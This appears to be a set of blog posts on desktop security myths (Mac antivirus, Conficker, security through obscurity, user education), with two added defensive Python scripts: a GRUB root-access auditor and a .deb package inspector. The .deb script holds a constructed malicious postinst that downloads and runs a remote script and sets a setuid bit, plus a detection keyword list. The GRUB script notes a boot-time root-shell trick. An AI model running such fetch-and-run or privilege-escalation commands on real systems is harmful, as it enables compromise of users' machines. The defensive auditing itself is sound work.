A self-proclaimed analyst at CNET has predicted that Apple will recommend antivirus.
Apart from the fact that Apple already did recommend antivirus a few months ago (and has since removed that page), isn’t that quite obvious? Some prediction. Unfortunately, the reasoning behind that prediction makes me wonder what Jon Oltsik is analyzing. Here are the reasons he gives for Apple recommending antivirus, and they’re all pretty much baseless:
Macs users are a lucrative target. Mac owners tend to affluent and Net savvy [sic]. To the bad guys, this means identities to steal and broadband connections to exploit.
If Mac users tend to be net-savvy, then why are their machines being compromised? Why don’t they have mechanisms in place to protect themselves from identity theft? If Macs are currently such a great target for malware, why is there so little malware out there for Macs now?
Organized cybercrime is diversifying. Cybercriminals tend to work as a loose confederation with each group specializing in a certain task. There are malware writers, botnet owners, mules, etc. Some entrepreneurial bad guy is bound to see a green field market in Mac cybercrime, recruit Mac hackers, develop expertise, and market these capabilities. If there is an equivalent of a cybercrime venture capital firm, they are probably looking at business plans like this already.
Diversifying the ways you compromise machines doesn’t mean attacking additional platforms. A second platform is just more work for very little return.
Macs are growing in the enterprise. In many large firms, Macs make up about 5 percent of endpoints. If the bad guys infect these systems, they can troll the network looking for other vulnerabilities and juicy data at will.
How about if the bad guys infected the machines that make up 95% of endpoints? Wouldn’t that give them more “juicy data”?
Macs are fairly easy to hack. In March as part of a contest, security expert Charlie Miller won $5,000 for exploiting a hole in Safari in about 10 seconds. If he can do this in 10 seconds, how many techies can do it in an hour? This is a frightening thought to me.
Okay, now this is totally ridiculous. Charlie Miller didn’t just walk into that competition and find a hole in 10 seconds. He knew about that hole for over a year and then exploited it in 10 seconds (in his own words: “It was an exploit against Safari 4 and it also works on Safari 3. I actually found this bug before last year’s Pwn2Own but, at the time, it was harder to exploit”). There’s a big difference there.
And all operating systems have security holes. That’s why Microsoft, Apple, and even Linux distribution maintainers all issue regular updates and patches.
I don’t understand why people imagine that you either have an unprotected computer or you have antivirus. (Or they think that an operating system that ever has a security hole is necessarily as insecure as another operating system with security holes.) Antivirus and protection are not the same thing. They’re not even similar. Antivirus does not offer you any real security at all. Don’t believe me? Go ask all the Windows users infected with malware what antivirus they’re running. Odds are that almost all of them will have some kind of fancy schmancy “security” software installed… software that did nothing to protect them.
Mac OS X isn’t a model of security, but its defaults are certainly better than Windows’ defaults. No operating system is invincible, and that includes Mac OS X. But Mac users will be no more protected with antivirus software than without it. Know what the latest security breaches were for Macs? Trojans. Do you know how useful antivirus is against gullible users installing pirated software? Not at all.
Trojans rely on social engineering, and no operating system “security” can stop that, because the security hole is the user, not the computer. If the user can be tricked into giving away her password or granting a bad program access to system files, then you can have all the proper privilege separation or “security” suites in the world, and they will all be for naught. Have NoScript installed? She’ll whitelist every site. Have heuristics that guess at malware? They’ll give so many false positives that she’ll learn to ignore the warnings.
Why will Apple eventually recommend antivirus? Plain and simple—because antivirus software is the most successful placebo ever introduced to the mass populace. As Mac marketshare continues to grow, more and more trojans will pop up, and more and more gullible users will keep installing them, and Apple will finally have to admit that Macs are just computers and not magic. But instead of saying “Users are stupid and need education,” they’ll toe the party line and recommend people install useless antivirus software, just as Microsoft does now. At least then they can enter into lucrative business partnerships with antivirus software companies.
Conficker worm – silent is still deadly
April 1st, 2009
I find the “news” coverage of Conficker to be absolutely disgraceful. Is this what passes for journalism?
I want you to imagine that there is a parasite that can invade your body and reside in there indefinitely. Once in your body, it could give you a heart attack, it could poison your blood stream, or it could make your liver fail. Once the parasite was discovered to be in the wild, doctors discovered that you could avoid getting the parasite by simply washing your hands before you ate. They also figured out that the parasite was going to change shape on a certain day. As that day approaches, people who haven’t been washing their hands go into a panic. They don’t know if they have the parasite or not. They start running to quack doctors who say they’ll make sure to protect these people against the parasite if the potentially infected individuals just buy a subscription to a special drug. After the parasite changes shape, though, no one’s had a heart attack or failed liver yet. So all the parasite-infected people celebrate that the parasite hasn’t done anything.
What?! Did I miss something?
Yes, the scenario I’ve just described in biological terms is exactly what just happened with the Conficker worm that’s infected an estimated 10 million Windows computers.
Microsoft patched a flaw in Windows’ Server service back in October 2008 (security bulletin MS08-067). The Conficker worm, which spreads by exploiting this flaw, began surfacing around November 2008 and kept infecting Windows computers for months. The experts all knew that on April 1, 2009 the latest variant would switch to a new scheme for contacting its creators for updated instructions.
Then the panic came in. Oh, no! It’s coming! It’ll be the end of the internet as we know it. I’m turning off my computer that day. If I buy this antivirus software will it protect me? Hide the children! Oh. Nothing happened? It has the power to attack and bring down major websites and government systems or steal personal information but nothing appeared to happen today? Oh. Okay. It was a big joke then. Ha ha. Who cares if I’m infected? I’m just going to go on my merry way.
Uh, no. First of all, Windows users should regularly install Windows updates. This was patched even before it was a real threat. And it doesn’t matter if the world didn’t seem to end today. The Conficker worm has the power to do serious damage, and no one knows when it’ll decide to do that damage or what kind of damage it will decide to do. It doesn’t mean you fly into a panic as if it were Orson Welles’ reading of War of the Worlds. But it doesn’t mean you go on your merry, care-free way either.
Educate yourself. Protect yourself. Be sensible. Conficker is dangerous but instead of flying into blind paranoia, just take practical and level-headed steps to protect your computer and your personal information. Silent can still be deadly, and I’m not just talking about flatulence.
Disneyland “Security”?
October 29th, 2008
I have to say that Disneyland and California Adventure have a pretty smooth operation. Yes, they charge you an arm and a leg and a kidney for the two theme parks (especially if you want to go to both and not just one), but they know how to manage large crowds of people.
The people leaving rides exit one direction. The people getting on the rides enter from the other side, and only after the people leaving have left. The staff rope off sidewalks for parades so that there’s a clear division between those who want to sit and watch the parade and those who want to pass through the area. The “fast pass” system makes it easy to get into semi-popular (not the absolute newest, though) rides without waiting in line for hours.
But what is up with the “security” check when you first arrive at the park? It’s not like airport security (which has its own problems and holes)… it doesn’t even resemble security. If you have a bag, they have you open the bag, and they take a cursory glance inside the bag. I had a backpack and unzipped the large pocket and that’s all they saw. I don’t know if they were checking for guns, drugs, or bombs, but I could have had any or all of the above in the small pocket of my backpack, the large pocket (but buried underneath the top layer of stuff), or my jacket pockets.
The second time I went through the check, they picked up my little insulated lunch bag and asked “What’s in this?” I said it was some snacks. They believed me and put it down. How is that security? I can say it’s full of snacks. Of course I can say that. It could really be full of fireworks or spray paint or box cutters. They’re going to take my word for it?
Generally Disney has a smooth operation going in its theme parks. If they could just get the “security” check out of there, or actually check people’s bags thoroughly, it’d be even smoother.
The effectiveness of “security through obscurity”
August 1st, 2008
I don’t believe that security through obscurity is ideal or ultimately effective. I don’t believe it’s a generally good security approach. Nevertheless, it is not often the same as no security at all. Security through obscurity can have its place.
A few years ago, when it was brought to light that the newest (at the time) Ubuntu release had left the first user’s password (which is also the administrative password) in plain text in a world-readable installer log, that incident was a huge embarrassment to Ubuntu developers, and they fixed the security hole within hours of it having been brought to their attention. Nevertheless, it had been in place for months prior to being brought to the developers’ attention. Were any Ubuntu installations compromised because of this bug? Probably not.
Likewise, most people don’t know that physical access to a computer means (except in rare cases) total administrative access. If you encrypt your drive, you can prevent unauthorized access to your files (as long as the machine is powered off rather than merely asleep, since a sleeping machine still holds the decryption key in memory). If you put a password on the BIOS and disable booting from CD, you can slow down or make more inconvenient the unauthorized access. Maybe that’ll stop people from compromising your computer if you’re away from it for only a few minutes.
Many users are naive to just what prolonged physical access means, though, in terms of security, and that’s dangerous, because then security through obscurity works against you. I used to believe (before I started using Linux) that having my laptop prompt me for a password upon waking the computer would mean that if my laptop were ever stolen, no one could get my files. Before I booted a Knoppix CD on his laptop, my dad used to think a fingerprint scanner would prevent people from seeing his files. In these cases, the “security” is obscured for the user and not the thief.
If a thief makes her living by taking the data off your computer (probably for the purposes of identity theft) and not solely by selling the hardware, she probably knows exactly how to access your data, whether it be resetting the BIOS password, booting from a live CD, or even moving the hard drive to another computer.
There have been quite a few debates about whether recovery mode in Ubuntu should exist or perhaps be hidden by default. In Windows, if you need emergency administrative access, you need to boot a CD. In Mac OS X, you have to know the relatively obscure hold-down-Cmd-S-while-booting procedure to get into single-user (recovery) mode. In Ubuntu, though, it’s right there in the boot menu. Just press the down arrow once and you’re in recovery mode, which means you have root (or total administrative) access to the computer.
On the one hand, obscuring recovery mode might give people a false sense of security (thinking it’s difficult to gain root access). On the other hand, having it in the boot menu kind of advertises it, and you might have a curious sibling or roommate who selects it and starts getting playful on the command-line, and she might not have done so if it weren’t in her face the way it is.
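The boot-menu situation above, checked mechanically. This is an added example and not part of the original post; it assumes GRUB 2 (which Ubuntu moved to in releases after this post was written) and an Ubuntu-style grub.cfg layout. In GRUB 2, setting a superuser with a password turns on authentication: without one, anyone can boot any entry and can also press “e” to edit the kernel line into a root shell, so hiding the recovery entry alone is obscurity, not security; with one, entries boot without a password only when marked --unrestricted. The script parses a grub.cfg and lists every entry that hands out root for free. Both configurations it runs on are constructed samples, and the <hash> placeholder stands in for real grub-mkpasswd-pbkdf2 output.

```python
"""Audit a GRUB 2 grub.cfg for menu entries that give root without a password.
Added example; assumes GRUB 2 and an Ubuntu-style grub.cfg."""
import re

# "set superusers=..." turns on authentication for editing entries and for the
# GRUB command line; entries then need --unrestricted to boot without a password.
_SUPERUSERS_RE = re.compile(r'^\s*set\s+superusers\s*=\s*"?([^"\n]*)"?', re.M)
_MENUENTRY_RE = re.compile(r"""^\s*menuentry\s+(['"])(.*?)\1(.*?)\{""", re.M)


def audit_grub_cfg(cfg):
    """Return (superusers, entries); each entry records what gates it."""
    m = _SUPERUSERS_RE.search(cfg)
    superusers = m.group(1).strip() if m else ""
    entries = []
    for em in _MENUENTRY_RE.finditer(cfg):
        title, opts = em.group(2), em.group(3)
        unrestricted = "--unrestricted" in opts
        users = re.search(r"--users\s+(\S+)", opts)
        if not superusers:
            gate = "none: anyone can boot it, or press 'e' and add init=/bin/sh"
        elif unrestricted:
            gate = "boots freely; editing it needs the superuser password"
        elif users:
            gate = "password of %s (or a superuser)" % users.group(1).strip("'\"")
        else:
            gate = "superuser password"
        entries.append({
            "title": title,
            "recovery": "recovery" in title.lower(),
            "open": not superusers or unrestricted,  # bootable with no password at all
            "gate": gate,
        })
    return superusers, entries


def unguarded_root(cfg):
    """Titles that hand out root with no password: every entry when no superuser
    is set (the 'e' key edits any of them into a root shell), otherwise only
    recovery entries someone left --unrestricted."""
    superusers, entries = audit_grub_cfg(cfg)
    if not superusers:
        return [e["title"] for e in entries]
    return [e["title"] for e in entries if e["recovery"] and e["open"]]


def report(cfg):
    """Human-readable summary of audit_grub_cfg()."""
    superusers, entries = audit_grub_cfg(cfg)
    out = ["superusers: %s" % (superusers or "NOT SET")]
    for e in entries:
        kind = "recovery" if e["recovery"] else "normal"
        out.append("  [%-8s] %s -> %s" % (kind, e["title"], e["gate"]))
    return "\n".join(out)


# Constructed sample resembling a stock Ubuntu grub.cfg: no superuser, and the
# recovery entry is one arrow key away.
WEAK_CFG = """\
### BEGIN /etc/grub.d/10_linux ###
menuentry 'Ubuntu' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-simple-1111' {
        linux   /vmlinuz root=/dev/sda1 ro quiet splash
}
submenu 'Advanced options for Ubuntu' $menuentry_id_option 'gnulinux-advanced-1111' {
        menuentry 'Ubuntu, with Linux 5.15.0-generic' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-5.15.0-generic-advanced-1111' {
                linux   /vmlinuz root=/dev/sda1 ro quiet splash
        }
        menuentry 'Ubuntu, with Linux 5.15.0-generic (recovery mode)' --class ubuntu --class gnu-linux --class gnu --class os $menuentry_id_option 'gnulinux-5.15.0-generic-recovery-1111' {
                linux   /vmlinuz root=/dev/sda1 ro recovery nomodeset
        }
}
### END /etc/grub.d/10_linux ###
"""

# Same machine after hardening: a superuser with a PBKDF2 hash (<hash> is a
# placeholder for grub-mkpasswd-pbkdf2 output) and only the normal entry marked
# --unrestricted, so unattended boots still work but recovery needs the password.
HARDENED_CFG = WEAK_CFG.replace(
    "menuentry 'Ubuntu' --class", "menuentry 'Ubuntu' --unrestricted --class"
) + """\
### BEGIN /etc/grub.d/40_custom ###
set superusers="admin"
password_pbkdf2 admin grub.pbkdf2.sha512.10000.<hash>
### END /etc/grub.d/40_custom ###
"""

if __name__ == "__main__":
    for label, cfg in (("stock", WEAK_CFG), ("hardened", HARDENED_CFG)):
        print("== %s ==" % label)
        print(report(cfg))
        print("root for free:", unguarded_root(cfg) or "nothing")
```

On a real machine, run audit_grub_cfg() on /boot/grub/grub.cfg. The hardened shape comes from generating a hash with grub-mkpasswd-pbkdf2, adding the set superusers and password_pbkdf2 lines to /etc/grub.d/40_custom, adding --unrestricted to the entry that should boot unattended, and running update-grub; setting GRUB_DISABLE_RECOVERY="true" in /etc/default/grub merely hides the recovery entries, which is the obscurity half of the tradeoff. None of this stops a live CD or a removed drive, which is why the audit belongs next to disk encryption rather than instead of it.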
Outside of the computer world, it’s a bit like keeping the key to your house underneath the welcome mat. Doing so is definitely bad security. On the other hand, most people won’t know exactly where you keep your key or if you keep it under the welcome mat at all. If you post up a big sign next to your door saying “Hey, the key is underneath this welcome mat!” you’ll be sure to have your home broken into.
When it comes to computer security, encryption and restriction of physical access should definitely be publicized more as real security options, but I do believe there are tradeoffs both to embracing and to eschewing security through obscurity. Just make sure you are obscuring access for others and not for yourself.
Without education, it doesn’t matter which OS is “more secure”
January 22nd, 2008
In Linux online communities, oftentimes there are debates about which operating system is the most secure—Windows or a Linux-based distribution. The debates usually go something like this:
Do I have to worry about security in Linux the way I did in Windows? No, you don’t have to. Linux is much more secure. But isn’t that just because it’s less targeted? If it were as popular as Windows, it would have just as many security problems. No, it wouldn’t. Read this article about how Linux has better security, and don’t forget that Linux servers are huge targets and still more secure than Windows servers.
And it goes on and on. The details of a secure structure, sensible (from a security standpoint) defaults, and frequent patches for exploits are all important parts of security. Ultimately, though, security debates about the structures of the OS are moot when the user does not employ good security practices. It’s a bit like people debating whether kevlar is “more secure” than chainmail armor. Well, what if the attack is through biological warfare rather than a bullet or sword? What if the person you’re trying to secure can be tricked into taking off the kevlar/chainmail? Then it doesn’t really matter which covering is more difficult to penetrate, does it?
And this is also why bringing servers into desktop security debates doesn’t shed light on whether an increase in user base will lead to more security compromises. Servers tend to be administered by server administrators, professionals whose job it is to constantly battle and prevent online security breaches. On the home desktop (and sometimes even the business workstation), users tend to be less savvy about what to click or not click, what to install or not install, and when it’s a good idea to type one’s password.
Yes, developers should try to strengthen the security of the OS in terms of structure and defaults. Yes, developers should create patches for newly discovered exploits (buffer overflows, for example). Nevertheless, if the Linux user base does increase to the point where desktop Linux is a significant target for malicious users, and computer users in general remain as uneducated as they are now, then all those security patches will be for naught. Users who can’t discern the difference between a spoofed webpage and a real webpage are vulnerabilities that can be patched only through education. Users who will give their passwords away to untrustworthy sources are vulnerabilities. Users who will install some “cool” program (yes, in Ubuntu it could be a .deb file you double-click or an added repository) that happens to contain spyware or a rootkit are vulnerabilities.
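What double-clicking that “cool” .deb actually hands over, as an added example that is not part of the original post: dpkg runs the package’s maintainer scripts (preinst, postinst, prerm, postrm) as root, so the education that matters is knowing to read those scripts before saying yes. The script below opens a .deb with nothing but the standard library (the container is an ar archive holding debian-binary, control.tar.* and data.tar.*), pulls out the control file and maintainer scripts, and flags lines that a desktop program’s installer has no reason to contain. The package it inspects is a constructed sample built in memory, the package name and hostnames are invented, and the red-flag list is an illustrative assumption rather than a real malware scanner.

```python
"""Look inside a .deb before installing it (added example, standard library only)."""
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")
# Illustrative red flags (an assumption for this example, not a real scanner):
# things a desktop program's install script, which dpkg runs as root, has no
# business doing.
SUSPICIOUS = ("curl ", "wget ", "/etc/ld.so.preload", "chmod u+s", "chmod 4",
              "crontab", "/etc/rc.local", "authorized_keys")


def ar_members(blob):
    """Yield (name, bytes) for each member of an ar(1) archive, the .deb container."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]                 # fixed 60-byte member header
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar header at offset %d" % pos)
        name = hdr[0:16].decode("ascii").rstrip(" /")
        size = int(hdr[48:58].decode("ascii").strip())
        start = pos + 60
        yield name, blob[start:start + size]
        pos = start + size + (size & 1)          # members are padded to even length


def inspect_deb(blob):
    """Return (control fields, {script name: text}) without installing anything."""
    members = dict(ar_members(blob))
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("not a version 2.0 .deb")
    ctrl_name = next(n for n in members if n.startswith("control.tar"))
    control, scripts = {}, {}
    with tarfile.open(fileobj=io.BytesIO(members[ctrl_name]), mode="r:*") as tf:
        for m in tf.getmembers():
            if not m.isfile():
                continue
            base = m.name.lstrip("./")           # stored as ./control, ./postinst, ...
            text = tf.extractfile(m).read().decode("utf-8", "replace")
            if base == "control":
                for line in text.splitlines():
                    if ":" in line and not line.startswith(" "):
                        key, value = line.split(":", 1)
                        control[key.strip()] = value.strip()
            elif base in MAINTAINER_SCRIPTS:
                scripts[base] = text
    return control, scripts


def red_flags(scripts):
    """Map script name -> suspicious lines; a hit means 'read this before installing'."""
    flags = {}
    for name, body in scripts.items():
        hits = [ln.strip() for ln in body.splitlines() if any(p in ln for p in SUSPICIOUS)]
        if hits:
            flags[name] = hits
    return flags


def report(blob):
    """One-screen summary a user could read before saying yes to the installer."""
    control, scripts = inspect_deb(blob)
    out = ["%s %s (%s)" % (control.get("Package", "?"), control.get("Version", "?"),
                           control.get("Maintainer", "?"))]
    out.append("maintainer scripts dpkg will run as root: %s"
               % (", ".join(sorted(scripts)) or "none"))
    for name, hits in sorted(red_flags(scripts).items()):
        out.extend("  %s: %s" % (name, h) for h in hits)
    return "\n".join(out)


def _tar_gz(files):
    """Constructed-sample helper: gzip tarball from {path: (mode, bytes)}."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, (mode, data) in files.items():
            ti = tarfile.TarInfo(path)
            ti.size, ti.mode = len(data), mode
            tf.addfile(ti, io.BytesIO(data))
    return buf.getvalue()


def _ar(members):
    """Constructed-sample helper: ar archive from [(name, bytes)]."""
    out = bytearray(b"!<arch>\n")
    for name, data in members:
        out += ("%-16s%-12d%-6d%-6d%-8s%-10d`\n" % (name, 0, 0, 0, "100644", len(data))).encode()
        out += data + (b"\n" if len(data) & 1 else b"")
    return bytes(out)


# Constructed sample: a "cool" screensaver whose postinst fetches and runs a
# script from the net and leaves a setuid helper behind. Names and hosts are invented.
SAMPLE_DEB = _ar([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", _tar_gz({
        "./control": (0o644, b"Package: coolsaver\nVersion: 1.0\nArchitecture: all\n"
                             b"Maintainer: nobody <nobody@example.invalid>\n"
                             b"Description: cool screensaver (constructed sample)\n"),
        "./postinst": (0o755, b"#!/bin/sh\nset -e\n"
                              b"wget -q http://updates.example.invalid/x.sh -O /tmp/.x && sh /tmp/.x\n"
                              b"chmod u+s /usr/lib/coolsaver/helper\n"),
    })),
    ("data.tar.gz", _tar_gz({"./usr/lib/coolsaver/helper": (0o755, b"#!/bin/sh\necho hi\n")})),
])

if __name__ == "__main__":
    print(report(SAMPLE_DEB))
```

On a real download, report(open("cool.deb", "rb").read()) shows the same thing that dpkg-deb -e cool.deb somedir would unpack; the value is in looking at all. An added repository is the same problem one level up: whoever holds its signing key gets to install anything as root on every update from then on, so the question to ask is whose key you just imported.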
A larger Linux user base with no better education than computer users as a whole have now will be subject to the same social-engineering malware attacks that Windows’ current, larger user base faces. No developer-created patch is going to fix that hole.